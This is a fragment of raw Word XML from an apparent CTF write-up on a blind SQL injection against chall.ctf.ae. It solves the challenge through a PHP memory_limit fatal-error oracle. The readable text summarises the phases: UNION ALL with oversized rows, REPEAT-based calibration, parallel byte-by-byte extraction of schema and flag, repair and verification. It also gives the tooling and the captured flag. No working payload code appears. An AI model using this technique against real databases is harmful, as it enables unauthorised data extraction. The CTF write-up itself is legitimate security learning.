              <w:t xml:space="preserve">Plain UNION + 160 MB rows</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Flat (temp-table materialization)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Breakthrough</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Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">UNION ALL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 800 x 200 KB rows</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Body 4557 -&gt; 167 - oracle found</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Calibration</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">REPEAT sizes 1/5/10/25 x 400 KB</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">tried to allocate encodes value linearly</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Extraction</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parallel byte-oracle, 4-5 workers</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">schemas -&gt; tables -&gt; columns -&gt; flag</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Repair</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Multi-mode re-read of 2 failed positions</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">? -&gt; p and ? -&gt; 0</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="800" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Verification</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Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Full-string equality oracle</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2100" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MATCH - pwnsec{9f5b1c7f391035d1}</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tooling: Python 3 with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, a Thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PoolExecutor of four to five workers, and a resumable JSON extraction state file. Total distinct requests across probing, extraction, and verification was in the low hundreds; every character of the flag cost exactly one request once the pipeline was warm.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:sectPr>
      <w:footerReference w:type="default" r:id="rId11"/>
      <w:footnotePr/>
      <w:endnotePr/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="16838" w:orient="portrait" w:w="11906"/>
      <w:pgMar w:top="1440" w:right="1417" w:bottom="1440" w:left="1701"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line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve"> PAGE \* ROMAN \* MERGEFORMAT </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line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve"> PAGE \* arabic \* MERGEFORMAT </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5d8d0" w:sz="2" w:space="0"/>
      </w:pBdr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">NO TIMING ATTACK!! // CTF Writeup by 0xnhsec</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Pr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:line="312"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2"/>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44"/>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5"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="154">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="148"/>
    <w:link w:val="746"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="155">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="148"/>
    <w:link w:val="747"/>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41"/>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41">
    <w:name w:val="Title"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="742">
    <w:name w:val="Heading 1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0f2e24"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="743">
    <w:name w:val="Heading 2"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="130" w:before="260" w:line="340" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1e5c49"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="744">
    <w:name w:val="Heading 3"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100" w:before="200" w:line="312" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2a7a65"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="745">
    <w:name w:val="Heading 4"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2e74b5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="746">
    <w:name w:val="Heading 5"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="2e74b5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="747">
    <w:name w:val="Heading 6"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1f4d78"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="748">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="749">
    <w:name w:val="List Paragraph"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="750">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0563c1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="751">
    <w:name w:val="footnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="752">
    <w:name w:val="footnote text"/>
    <w:link w:val="753"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="753">
    <w:name w:val="Footnote Text Char"/>
    <w:link w:val="752"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="754">
    <w:name w:val="endnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="755">
    <w:name w:val="endnote text"/>
    <w:link w:val="756"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="756">
    <w:name w:val="Endnote Text Char"/>
    <w:link w:val="755"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="757">
    <w:name w:val="toc 1"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="60" w:before="120"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="758">
    <w:name w:val="toc 2"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="40" w:before="60"/>
      <w:ind w:left="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="759">
    <w:name w:val="toc 3"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="20" w:before="40"/>
      <w:ind w:left="72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TIMING ATTACK!! - Blind SQL Injection via a PHP memory_limit Fatal Oracle</dc:title>
  <dc:creator>0xnhsec</dc:creator>
  <dc:description>CTF writeup: chall.ctf.ae blind SQLi solved via a memory-limit fatal oracle</dc:description>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-14T15:13:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-14T16:11:19Z</dcterms:modified>
</cp:coreProperties>
</file>